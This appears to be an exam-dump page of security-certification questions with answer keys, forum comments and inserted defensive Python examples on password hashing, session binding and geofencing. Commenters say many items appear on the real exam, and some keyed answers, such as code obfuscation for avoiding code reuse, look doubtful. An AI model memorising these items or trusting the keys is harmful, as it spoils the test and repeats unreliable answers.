version of the protocol and offers the strongest encryption ciphers available. By enabling TLSv2 on the web server, the analyst can ensure that "in
transport" encryption protection is provided to the server with the strongest ciphers available.
upvoted 4 times

okay123 1 month, 3 weeks ago
Selected Answer: BF
It's B and F
upvoted 3 times

Mindlos 2 months ago
agree with B,F
upvoted 2 times

JSOG 2 months ago
Selected Answer: BF
agree with BF
upvoted 3 times


Question #301 Topic 1

A security analyst is investigating an incident to determine what an attacker was able to do on a compromised laptop. The analyst reviews the
following SIEM log:

Which of the following describes the method that was used to compromise the laptop?

A. An attacker was able to move laterally from PC1 to PC2 using a pass-the-hash attack.

B. An attacker was able to bypass application whitelisting by emailing a spreadsheet attachment with an embedded PowerShell in the file.

C. An attacker was able to install malware to the C:\asdf234 folder and use it to gain administrator rights and launch Outlook.

D. An attacker was able to phish user credentials successfully from an Outlook user profile

Correct Answer: B

Community vote distribution: B (100%)

viksap 1 month, 2 weeks ago
What about the logs showing going from PC1 to PC2?
upvoted 2 times

Ranaer 2 days, 21 hours ago
While there have been attempts to log in on PC2, we don't have evidence of anything related to pass the hash, so I think it's safe to assume
this isn't the correct answer.
upvoted 1 times

JSOG 2 months ago
Selected Answer: B
Agree with B, as PowerShell was the only injection that worked
upvoted 3 times

[Removed] 1 month, 4 weeks ago
Where is the spreadsheet attachment according to the diagram and the B answer that you selected?
upvoted 2 times

Blueteam 1 month, 4 weeks ago
The first event says that an .exe file was blocked.
The second event says that a PowerShell process started, initiated by Outlook.
So an email attachment is most likely the case. Among all available options, B is talking about an attachment. It is not known that it is a
spreadsheet, but it is the only correct option.
upvoted 2 times

Nirmalabhi 1 week, 5 days ago
Excellent crack. Thanks, mate.
upvoted 1 times

Question #302 Topic 1

A security analyst discovers that a company's username and password database was posted on an Internet forum. The usernames and passwords
are stored in plain text. Which of the following would mitigate the damage done by this type of data exfiltration in the future?

A. Create DLP controls that prevent documents from leaving the network.

B. Implement salting and hashing.

C. Configure the web content filter to block access to the forum.

D. Increase password complexity requirements.

Correct Answer: B

Community vote distribution: B (100%)

FMMIR 1 month, 3 weeks ago
Selected Answer: B
To mitigate the damage done by this type of data exfiltration in the future, the analyst should implement salting and hashing (choice B).

Salting and hashing are techniques used to protect the security of passwords stored in a database. Salting involves adding random data, known
as a "salt," to each password before it is hashed. This makes it more difficult for attackers to crack the passwords by using pre-computed hash
tables, known as "rainbow tables." Hashing involves applying a one-way mathematical function, known as a "hash algorithm," to the salted
password to produce a fixed-length output, known as a "hash value." This makes it impossible to determine the original password from the hash
value, even if the attacker has access to the database. By implementing salting and hashing, the company can ensure that its passwords are
protected even if the database is compromised
upvoted 2 times
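The salting-and-hashing mitigation discussed for Question #302, as an added example that is not code from the ExamTopics page or any commenter. It uses PBKDF2-HMAC-SHA256 from Python's standard library: a fresh random salt per password, a self-describing stored record, and a constant-time comparison on verification. The record layout, iteration count and function names are this example's own assumptions; the sample credentials are constructed, with two users deliberately sharing a password to show that the stored records still differ.

```python
"""Salted, iterated password hashing versus plaintext storage.

Added example for the Question #302 discussion; not part of the ExamTopics
page. Record layout, iteration count and helper names are assumptions.
"""
import hashlib
import hmac
import os
from typing import Optional

ALGORITHM = "pbkdf2_sha256"
DEFAULT_ITERATIONS = 600_000   # assumption; tune to your hardware and current guidance
SALT_BYTES = 16


def hash_password(password: str, iterations: int = DEFAULT_ITERATIONS,
                  salt: Optional[bytes] = None) -> str:
    """Return a self-describing record 'alg$iterations$salt_hex$hash_hex'.

    A fresh random salt per password means identical passwords produce
    different records, which defeats precomputed (rainbow) tables and hides
    password reuse between accounts.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    try:
        alg, iters, salt_hex, hash_hex = record.split("$")
    except ValueError:
        return False          # malformed record
    if alg != ALGORITHM:
        return False          # unknown algorithm tag
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), hash_hex)


def build_user_db(credentials, iterations: int = DEFAULT_ITERATIONS) -> dict:
    """Map username -> hashed record; the plaintext password is never stored."""
    return {user: hash_password(pw, iterations) for user, pw in credentials}


def reused_password_visible(db: dict) -> bool:
    """True if any two stored records are identical.

    With per-user salts this is False even when users share a password; an
    unsalted hash store would leak the reuse immediately.
    """
    records = list(db.values())
    return len(records) != len(set(records))


# Constructed sample credentials; alice and bob deliberately share a password.
SAMPLE_CREDENTIALS = [
    ("alice", "correct horse battery"),
    ("bob", "correct horse battery"),
    ("carol", "hunter2"),
]

if __name__ == "__main__":
    db = build_user_db(SAMPLE_CREDENTIALS)
    for user, record in db.items():
        print(f"{user}: {record[:60]}...")
    print("reuse visible in stored records:", reused_password_visible(db))
    print("alice login ok:", verify_password("correct horse battery", db["alice"]))
    print("alice wrong password:", verify_password("wrong", db["alice"]))
```

If the database in the question had held records like these instead of plaintext, the forum post would expose only salted hashes that an attacker must brute-force one user at a time at the configured cost, which is the "mitigate the damage" outcome answer B is aiming for.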

Lv2023 1 month, 3 weeks ago
Agree with B on this one
upvoted 1 times

GetBuckets 1 month, 3 weeks ago
Yep. B is the best answer here.
upvoted 1 times

HL2020 1 month, 4 weeks ago
Selected Answer: B
Key phrase is "mitigate damage done". You salt and hash in case the db gets out.
upvoted 2 times

Blueteam 2 months ago
Correct answer is B:
Username and password shouldn't be stored as plain text.
upvoted 2 times


Question #303 Topic 1

Joe, an employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and
date of birth be provided to confirm Joe’s identity before sending him the prize. Which of the following BEST describes this type of email?

A. Spear phishing

B. Whaling

C. Phishing

D. Vishing

Correct Answer: C

Community vote distribution: C (100%)

sauna28 1 month, 3 weeks ago
Selected Answer: C
I'd go for C, a common phishing, because SPEAR PHISHING IS TARGETING A VERY SPECIFIC PERSON/GROUP OF PEOPLE
upvoted 2 times

JSOG 2 months ago
Selected Answer: C
this is just a common phishing by method of elimination
upvoted 3 times

Question #304 Topic 1

A company deployed a WiFi access point in a public area and wants to harden the configuration to make it more secure. After performing an
assessment, an analyst identifies that the access point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the
analyst disable to enhance the access point security?

A. WPA3

B. AES

C. RADIUS

D. WPS

Correct Answer: D

Community vote distribution: D (100%)

JSOG Highly Voted 2 months ago
Selected Answer: D
agree with D
upvoted 5 times

sauna28 Most Recent 1 month, 3 weeks ago
Selected Answer: D
Wifi Protected Setup - Even though WPS offers this convenience, it is appallingly insecure. Wireless networks with WPS enabled are highly
vulnerable to cybersecurity threats. Attackers can easily target the WPS function to steal network passwords, regardless of how complex the
password is.
upvoted 2 times


Question #305 Topic 1

Which of the following would be used to find the MOST common web-application vulnerabilities?

A. OWASP

B. MITRE ATT&CK

C. Cyber Kill Chain

D. SDLC

Correct Answer: A

Community vote distribution: A (100%)

sauna28 1 month, 3 weeks ago
Selected Answer: A
Anything related to WEB APPLICATION SECURITY = OWASP
The Open Web Application Security Project (FRAMEWORK) is an online community that produces freely-available articles, methodologies,
documentation, tools, and technologies in the field of web application security. The Open Web Application Security Project provides free and
open resources.
• MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary
behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding
security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: A
The correct answer is A. OWASP (Open Web Application Security Project). OWASP is a non-profit organization that provides a comprehensive list
of the most common web application vulnerabilities and offers recommendations for addressing them. MITRE ATT&CK is a framework for
tracking and analyzing the tactics, techniques, and procedures used by attackers, while Cyber Kill Chain is a methodology for identifying and
disrupting an attacker's activities. SDLC (Software Development Life Cycle) is a systematic approach to developing software.
upvoted 2 times

Blueteam 2 months ago
A is the most specific answer.
upvoted 3 times


Question #306 Topic 1

A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the
section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are
unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas
of the building. There have also been reports of users being required to enter their credentials on web pages in order to gain access to them.
Which of the following is the MOST likely cause of this issue?

A. An external access point is engaging in an evil-twin attack.

B. The signal on the WAP needs to be increased in that section of the building.

C. The certificates have expired on the devices and need to be reinstalled.

D. The users in that section of the building are on a VLAN that is being blocked by the firewall

Correct Answer: A

Community vote distribution: A (100%)

Blueteam Highly Voted 2 months ago
A is correct. Typical evil twin.
upvoted 5 times

FMMIR Most Recent 1 month, 3 weeks ago
Selected Answer: A
The most likely cause of this issue is an external access point engaging in an evil-twin attack (choice A).

An evil-twin attack is a type of wireless network security attack in which an attacker sets up a fake wireless access point (WAP) that has the same
name and security settings as a legitimate WAP. When users attempt to connect to the legitimate WAP, they may unknowingly connect to the fake
WAP instead, which allows the attacker to intercept and potentially modify their network traffic. This type of attack is particularly likely to be
successful in areas where there are multiple WAPs, such as in the section of the building closest to the parking lot, where users may be returning
to their desks after using their devices elsewhere in the building. The intermittent slow speeds and inability to connect to network drives, as well
as the reports of users being required to re-enter their credentials on web pages, are all symptoms of an evil-twin attack.
upvoted 4 times


Question #307 Topic 1

A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator
MOST likely use to confirm the suspicions?

A. Nmap

B. Wireshark

C. Autopsy

D. DNSEnum

Correct Answer: A

Community vote distribution: A (92%) 8%

dfbdfb Highly Voted 1 month ago
Good luck guys! I passed yesterday after reviewing here. Figured I'd come back for an update since others haven't. I'd say 50-60%+ of my
questions came from here, but a lot of those were ones without clear answers (ex, questions with multiple answers at or near 50/50). This guide is
more of a study sheet vs an answer key. Don't go with the admin selected answer and USE THE DISCUSSIONS as well as some external material
to find the correct answers. Pay attention to PBQs! I had 4 and 3/4 came from here.
upvoted 7 times

Sandon Most Recent 1 week ago
Selected Answer: A
I passed today with a 797. 3 of the 4 PBQs I got were on here. I'd say 65% of my questions were on this site, so don't rely on it completely, do
your homework.
upvoted 3 times

FMMIR 1 month, 3 weeks ago
Selected Answer: A
Nmap, or Network Mapper, is a network scanning and security auditing tool that is commonly used to discover and map network resources, such
as servers and devices, and to identify the services running on those resources. It can be used to scan a single host or a range of hosts to
determine which ports are open and which services are running on those ports. This information can be used to identify services that may be
unnecessary or potentially insecure, and to take appropriate action to mitigate any security risks. In this case, the administrator can use Nmap to
scan the server and confirm whether there are any unnecessary services running on it.
upvoted 4 times

stonefaces_kitten 1 month, 2 weeks ago
Agree

Me and 2 others just took the test and all passed. For two of us we would say about 40 to 50% is on this dump. For the 3rd guy he said only
about 20%.
upvoted 2 times

Done461 2 months ago
Selected Answer: A
Weak protocols = nmap
upvoted 2 times

Blueteam 2 months ago
The answer is A. NMAP will enumerate the ports.
upvoted 4 times

JSOG 2 months ago
Selected Answer: A
My bad, I will say A, didn't read the question well. B will analyse the services running while Nmap will locate the services running
upvoted 2 times

JSOG 2 months ago
Selected Answer: B
I will go with B, as A helps find which applications are running on the network
upvoted 1 times


Question #308 Topic 1

A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works BEST
until a proper fix is released?

A. Detective

B. Compensating

C. Deterrent

D. Corrective

Correct Answer: B

Question #309 Topic 1

While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to
network switches. Which of the following is the security analyst MOST likely observing?

A. SNMP traps

B. A Telnet session

C. An SSH connection

D. SFTP traffic

Correct Answer: B

Question #310 Topic 1

An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document’s contents, the author
notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks
was used?

A. Cryptomalware

B. Hash substitution

C. Collision

D. Phishing

Correct Answer: B


Question #311 Topic 1

A security analyst notices that specific files are being deleted each time a systems administrator is on vacation. Which of the following BEST
describes the type of malware that is running?

A. Fileless virus

B. Logic bomb

C. Keylogger

D. Ransomware

Correct Answer: B

Question #312 Topic 1

Which of the following involves the inclusion of code in the main codebase as soon as it is written?

A. Continuous monitoring

B. Continuous deployment

C. Continuous validation

D. Continuous integration

Correct Answer: D

Question #313 Topic 1

Which of the following can reduce vulnerabilities by avoiding code reuse?

A. Memory management

B. Stored procedures

C. Normalization

D. Code obfuscation

Correct Answer: D

Question #314 Topic 1

The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building. Which of the
following should be closely coordinated between the technology, cybersecurity, and physical security departments? Select 1

A. Authentication protocol

B. Encryption type

C. WAP placement

D. VPN configuration

Correct Answer: C

Question #315 Topic 1

Which of the following is an example of risk avoidance?

A. Installing security updates directly in production to expedite vulnerability fixes

B. Buying insurance to prepare for financial loss associated with exploits

C. Not installing new software to prevent compatibility errors

D. Not taking preventive measures to stop the theft of equipment

Correct Answer: C

Question #316 Topic 1

A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the
administrator does not want to send back an RST. Which of the following actions in the firewall rule would work BEST?

A. Drop

B. Reject

C. Log alert

D. Permit

Correct Answer: A

Question #317 Topic 1

A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies
would MOST likely contain language that would prohibit this activity?

A. NDA

B. BPA

C. AUP

D. SLA

Correct Answer: C

Question #318 Topic 1

Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current
cyberintrusions, phishing, and other malicious cyberactivity?

A. Intelligence fusion

B. Review reports

C. Log reviews

D. Threat feeds

Correct Answer: D

Question #319 Topic 1

Which of the following would be the BEST resource for a software developer who is looking to improve secure coding practices for web
applications?

A. OWASP

B. Vulnerability scan results

C. NIST CSF

D. Third-party libraries

Correct Answer: A

Question #320 Topic 1

Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to
maintain day-to-day business operations. Which of the following documents did Ann receive?

A. An annual privacy notice

B. A non-disclosure agreement

C. A privileged-user agreement

D. A memorandum of understanding

Correct Answer: A

Question #321 Topic 1

A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP system for the company. The CISO
categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls
before authorizing the system. Which of the following is the CISO using to evaluate the environment for this new ERP system?

A. The Diamond Model of Intrusion Analysis

B. CIS Critical Security Controls

C. NIST Risk Management Framework

D. ISO 27002

Correct Answer: C

Question #322 Topic 1

A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility
issues. The OSs are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer has
created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, while also creating backups
of the systems for recovery. Which of the following resiliency techniques will provide these capabilities?

A. Redundancy

B. RAID 1+5

C. Virtual machines

D. Full backups

Correct Answer: C

Question #323 Topic 1

A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk computer’s operating system has been hardened
and tested. A security engineer is concerned that someone could use removable media to install a rootkit. Which of the following should the
security engineer configure to BEST protect the kiosk computer?

A. Measured boot

B. Boot attestation

C. UEFI

D. EDR

Correct Answer: B

Question #324 Topic 1

A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly.
Which of the following technologies should the IT manager use when implementing MFA?

A. One-time passwords

B. Email tokens

C. Push notifications

D. Hardware authentication

Correct Answer: C

Question #325 Topic 1

A security engineer is reviewing the logs from a SAML application that is configured to use MFA. During this review, the engineer notices a high
volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed
without a VPN, has a policy that allows time-based tokens to be generated. Users who change locations should be required to reauthenticate but
have been able to log in without doing so. Which of the following statements BEST explains the issue?

A. OpenID is mandatory to make the MFA requirements work.

B. An incorrect browser has been detected by the SAML application.

C. The access device has a trusted certificate installed that is overwriting the session token.

D. The user’s IP address is changing between logins, but the application is not invalidating the token.

Correct Answer: D
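
Added example (not from the ExamTopics page or any SAML product) of the server-side check Question #325 says is missing: a session issued after MFA is bound to the context it was issued in, and a request arriving from a different country (or, optionally, a different IP) revokes the session and forces reauthentication. The IP-to-country table, token names and addresses are constructed; a real service would consult a GeoIP database.

```python
from dataclasses import dataclass

# Constructed lookup of client IP to country (documentation-range addresses).
GEOIP = {
    "203.0.113.10": "US",
    "203.0.113.11": "US",
    "198.51.100.7": "DE",
}

@dataclass
class Session:
    user: str
    ip: str
    country: str
    issued_at: float

class SessionStore:
    """Server-side session table for an application that issues a token after MFA.

    bind_country=False reproduces the behaviour described in the question: the
    token stays valid no matter where the next request comes from."""

    def __init__(self, bind_country: bool = True, bind_ip: bool = False,
                 max_age_seconds: int = 8 * 3600):
        self.sessions: dict[str, Session] = {}
        self.bind_country = bind_country
        self.bind_ip = bind_ip
        self.max_age = max_age_seconds

    def issue(self, token: str, user: str, ip: str, now: float) -> Session:
        session = Session(user, ip, GEOIP.get(ip, "unknown"), now)
        self.sessions[token] = session
        return session

    def validate(self, token: str, ip: str, now: float) -> str:
        """Return 'ok', 'reauth' (token revoked, user must complete MFA again)
        or 'invalid' (unknown or already revoked token)."""
        session = self.sessions.get(token)
        if session is None:
            return "invalid"
        if now - session.issued_at > self.max_age:
            del self.sessions[token]
            return "reauth"
        country = GEOIP.get(ip, "unknown")
        moved = ((self.bind_country and country != session.country)
                 or (self.bind_ip and ip != session.ip))
        if moved:
            # Revoke server-side so a replayed copy of the token is refused too.
            del self.sessions[token]
            return "reauth"
        return "ok"
```

Binding to the exact IP is off by default because mobile and NAT users change addresses legitimately; binding to country (or a coarser region) catches the "travelling user with an old token" case without that churn.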

Question #326 Topic 1

An organization wants to enable built-in FDE on all laptops. Which of the following should the organization ensure is installed on all laptops?

A. TPM

B. CA

C. SAML

D. CRL

Correct Answer: A

Question #327 Topic 1

A security analyst needs to centrally manage credentials and permissions to the company’s network devices. The following security requirements
must be met:

• All actions performed by the network staff must be logged.
• Per-command permissions must be possible.
• The authentication server and the devices must communicate through TCP.

Which of the following authentication protocols should the analyst choose?

A. Kerberos

B. CHAP

C. TACACS+

D. RADIUS

Correct Answer: C

Question #328 Topic 1

An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the
first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed. Which of the following
is the MOST likely cause for the high number of findings?

A. The vulnerability scanner was not properly configured and generated a high number of false positives.

B. Third-party libraries have been loaded into the repository and should be removed from the codebase.

C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue.

D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.

Correct Answer: A

Question #329 Topic 1

An organization is concerned about intellectual property theft by employees who leave the organization. Which of the following should the
organization MOST likely implement?

A. CBT

B. NDA

C. MOU

D. AUP

Correct Answer: B

Question #330 Topic 1

A security analyst reviews web server logs and notices the following lines:

Which of the following vulnerabilities is the attacker trying to exploit?

A. Token reuse

B. SQLi

C. CSRF

D. XSS

Correct Answer: D

Question #331 Topic 1

A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline. The manager would like to
implement a high availability pair to:

A. decrease the mean time between failures.

B. remove the single point of failure.

C. cut down the mean time to repair.

D. reduce the recovery time objective.

Correct Answer: B

Question #332 Topic 1

A major manufacturing company updated its internal infrastructure and just recently started to allow OAuth applications to access corporate data.
Data leakage is now being reported. Which of the following MOST likely caused the issue?

A. Privilege creep

B. Unmodified default settings

C. TLS protocol vulnerabilities

D. Improper patch management

Correct Answer: B

Question #333 Topic 1

While preparing a software inventory report, a security analyst discovers an unauthorized program installed on most of the company’s servers. The
program utilizes the same code signing certificate as an application deployed to only the accounting team. After removing the unauthorized
program, which of the following mitigations should the analyst implement to BEST secure the server environment?

A. Revoke the code signing certificate used by both programs.

B. Block all unapproved file hashes from installation

C. Add the accounting application file hash to the allowed list.

D. Update the code signing certificate for the approved application.

Correct Answer: A

Question #334 Topic 1

A security analyst is reviewing the latest vulnerability scan report for a web server following an incident. The vulnerability report showed no
concerning findings. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available
for the vulnerability. Which of the following is the MOST likely cause?

A. Security patches failed to install due to a version incompatibility.

B. An adversary altered the vulnerability scan reports.

C. A zero-day vulnerability was used to exploit the web server.

D. The scan reported a false negative for the vulnerability.

Correct Answer: D

VHuckle 20 hours, 12 minutes ago
The answer cannot be C, as the definition of a zero-day exploit is one for which no patch is yet available. The question clearly states that a patch is available.
upvoted 1 times

VHuckle 20 hours, 11 minutes ago
I'm going with D, that the scan delivered a false negative. Willing to be corrected if that's not the proper answer.
upvoted 2 times

Question #335 Topic 1

The help desk has received calls from users in multiple locations who are unable to access core network services. The network team has
identified and turned off the network switches using remote commands. Which of the following actions should the network team take NEXT?

A. Disconnect all external network connections from the firewall.

B. Send response teams to the network switch locations to perform updates.

C. Turn on all the network switches by using the centralized management software.

D. Initiate the organization's incident response plan.

Correct Answer: D

Question #336 Topic 1

An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is
the attacker MOST likely attempting?

A. A spear-phishing attack

B. A watering-hole attack

C. Typo squatting

D. A phishing attack

Correct Answer: B

VHuckle 20 hours, 8 minutes ago
Selected Answer: B
Watering-holes target specific audiences.
upvoted 1 times

Question #337 Topic 1

An organization is moving away from the use of client-side and server-side certificates for EAP. The company would like for the new EAP solution
to have the ability to detect rogue access points. Which of the following would accomplish these requirements?

A. PEAP

B. EAP-FAST

C. EAP-TLS

D. EAP-TTLS

Correct Answer: B

Question #338 Topic 1

A security analyst receives a SIEM alert that someone logged in to the appadmin test account, which is only used for the early detection of
attacks. The security analyst then reviews the following application log:

Which of the following can the security analyst conclude?

A. A replay attack is being conducted against the application.

B. An injection attack is being conducted against a user authentication system.

C. A service account password may have been changed, resulting in continuous failed logins within the application.

D. A credentialed vulnerability scanner attack is testing several CVEs against the application.

Correct Answer: B

Question #339 Topic 1

A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. Which of the
following documents would the third-party vendor MOST likely be required to review and sign?

A. SLA

B. NDA

C. MOU

D. AUP

Correct Answer: B

Question #340 Topic 1

Which of the following is an administrative control that would be MOST effective to reduce the occurrence of malware execution?

A. Security awareness training

B. Frequency of NIDS updates

C. Change control procedures

D. EDR reporting cycle

Correct Answer: C

Msc0009 22 hours, 28 minutes ago
Selected Answer: A
It must be A.
upvoted 2 times

Question #341 Topic 1

Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a
password reset link. Which of the following attacks is being used to target the company?

A. Phishing

B. Vishing

C. Smishing

D. Spam

Correct Answer: C

Question #342 Topic 1

During a Chief Information Security Officer (CISO) convention to discuss security awareness, the attendees are provided with a network
connection to use as a resource. As the convention progresses, one of the attendees starts to notice delays in the connection, and the HTTPS site
requests are reverting to HTTP. Which of the following BEST describes what is happening?

A. Birthday collision on the certificate key

B. DNS hijacking to reroute traffic

C. Brute force to the access point

D. A SSL/TLS downgrade

Correct Answer: D

Question #343 Topic 1

A user enters a password to log in to a workstation and is then prompted to enter an authentication code. Which of the following MFA factors or
attributes are being utilized in the authentication process? (Choose two.)

A. Something you know

B. Something you have

C. Somewhere you are

D. Someone you know

E. Something you are

F. Something you can do

Correct Answer: AB

Question #344 Topic 1

A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems. The
company follows a strict process to harden systems immediately upon delivery. Even with these strict security measures in place, an incident
occurred from one of the workstations. The root cause appears to be that the SoC was tampered with or replaced. Which of the following MOST
likely occurred?

A. Fileless malware

B. A downgrade attack

C. A supply-chain attack

D. A logic bomb

E. Misconfigured BIOS

Correct Answer: C

Question #345 Topic 1

Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security
engineer has been on vacation for a few days. Which of the following attacks can the account lockout be attributed to?

A. Backdoor

B. Brute-force

C. Rootkit

D. Trojan

Correct Answer: B

Question #346 Topic 1

A security analyst is reviewing the output of a web server log and notices a particular account is attempting to transfer large amounts of money:

Which of the following types of attacks is MOST likely being conducted?

A. SQLi

B. CSRF

C. Spear phishing

D. API

Correct Answer: B

Question #347 Topic 1

After installing a patch on a security appliance, an organization realized a massive data exfiltration had occurred. Which of the following BEST
describes the incident?

A. Supply chain attack

B. Ransomware attack

C. Cryptographic attack

D. Password attack

Correct Answer: A

Question #348 Topic 1

A security analyst reviews web server logs and notices the following lines:

Which of the following vulnerabilities has the attacker exploited? (Choose two.)

A. Race condition

B. LFI

C. Pass the hash

D. XSS

E. RFI

F. Directory traversal

Correct Answer: BF

Question #349 Topic 1

An information security manager for an organization is completing a PCI DSS self-assessment for the first time. Which of the following is the
MOST likely reason for this type of assessment?

A. An international expansion project is currently underway.

B. Outside consultants utilize this tool to measure security maturity.

C. The organization is expecting to process credit card information.

D. A government regulator has requested this audit to be completed.

Correct Answer: C

Question #350 Topic 1

Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control
vestibule, three doors leading to the server floor, a door to the server floor itself, and eventually to a caged area solely for the organization’s
hardware. Which of the following controls is described in this scenario?

A. Compensating

B. Deterrent

C. Preventive

D. Detective

Correct Answer: C

Question #351 Topic 1

A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to
the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs.
Which of the following is the MOST likely cause of this issue?

A. TFTP was disabled on the local hosts.

B. SSH was turned off instead of modifying the configuration file.

C. Remote login was disabled in the networkd.conf instead of using the sshd.conf.

D. Network services are no longer running on the NAS.

Correct Answer: B

Question #352 Topic 1

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given the
documentation only available to the customers of the applications. Which of the following BEST represents the type of testing that will occur?

A. Bug bounty

B. Black-box

C. Gray-box

D. White-box

Correct Answer: C

Question #353 Topic 1

A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?

A. Disable Telnet and force SSH.

B. Establish a continuous ping.

C. Utilize an agentless monitor.

D. Enable SNMPv3 with passwords.

Correct Answer: C

Question #354 Topic 1

A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization’s vulnerabilities.
Which of the following would BEST meet this need?

A. CVE

B. SIEM

C. SOAR

D. CVSS

Correct Answer: D

Question #355 Topic 1

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use
their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following
deployment models is the company implementing?

A. CYOD

B. MDM

C. COPE

D. VDI

Correct Answer: D

VHuckle 19 hours, 54 minutes ago
Selected Answer: D
The answer cannot be C. By definition, COPE (corporate-owned, personally enabled) is a business model in which an organization provides its employees with mobile computing devices and allows the employees to use them as if they were personally owned notebook computers, tablets or smartphones.

The question explicitly states that users must use their personal equipment, not company-provided. The only logical answer in that scenario is VDI (Virtual Desktop Infrastructure, a technology that refers to the use of virtual machines to provide and manage virtual desktops).
upvoted 2 times

Question #356 Topic 1

A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words.
Which of the following would be the BEST to use?

A. IDS solution

B. EDR solution

C. HIPS software solution

D. Network DLP solution

Correct Answer: D

Question #357 Topic 1

The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user
digital identities using SAML-based protocols. Which of the following will this enable?

A. SSO

B. MFA

C. PKI

D. DLP

Correct Answer: A

Question #358 Topic 1

An employee’s company account was used in a data breach. Interviews with the employee revealed:

• The employee was able to avoid changing passwords by using a previous password again.
• The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.)

A. Geographic dispersal

B. Password complexity

C. Password history

D. Geotagging

E. Password lockout

F. Geofencing

Correct Answer: CF

VHuckle 19 hours, 51 minutes ago
Selected Answer: C
Question states to choose 2. Correct answer is CF.
C - User bypassed changing passwords by using a previously used pwd.
F - User has never travelled to another country, so geofencing will limit access to current location.
upvoted 2 times

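Added example (not from the ExamTopics page or any identity product) implementing the two controls Question #358 asks for: a password history that stores salted PBKDF2 hashes of the last N passwords, so the old password is rejected without the system ever keeping it in clear, and a per-user login geofence that denies countries not on the user's list. The user names, passwords and country codes are constructed; the country of a login would come from a GeoIP lookup in practice.

```python
import hashlib
import os

class AccountPolicy:
    """Password history plus login geofencing.

    Password history keeps salted PBKDF2 hashes of the last N passwords so a
    user cannot rotate back to a previous one; geofencing refuses logins from
    countries the user is not expected to be in.  Country allow-lists are
    per user and default to deny."""

    def __init__(self, history_depth: int = 10, iterations: int = 100_000):
        self.history_depth = history_depth
        self.iterations = iterations
        # user -> list of (salt, hash), oldest first
        self.history: dict[str, list[tuple[bytes, bytes]]] = {}
        self.allowed_countries: dict[str, set[str]] = {}

    def _hash(self, password: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, self.iterations)

    def password_previously_used(self, user: str, password: str) -> bool:
        # Each entry has its own salt, so the candidate is re-hashed per entry.
        return any(self._hash(password, salt) == digest
                   for salt, digest in self.history.get(user, []))

    def set_password(self, user: str, password: str) -> bool:
        """Return False (and change nothing) if the password is in the history."""
        if self.password_previously_used(user, password):
            return False
        salt = os.urandom(16)
        entries = self.history.setdefault(user, [])
        entries.append((salt, self._hash(password, salt)))
        del entries[:-self.history_depth]   # keep only the newest N
        return True

    def allow_login_from(self, user: str, *countries: str) -> None:
        self.allowed_countries[user] = set(countries)

    def login_permitted(self, user: str, country: str) -> bool:
        """Geofence: deny unless the login country is on the user's list.
        Users with no list are denied, the safer failure mode."""
        return country in self.allowed_countries.get(user, set())
```

The history is a list of independently salted hashes rather than a single hash set because a shared salt would let an attacker who obtains the table test one guess against every entry at once.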
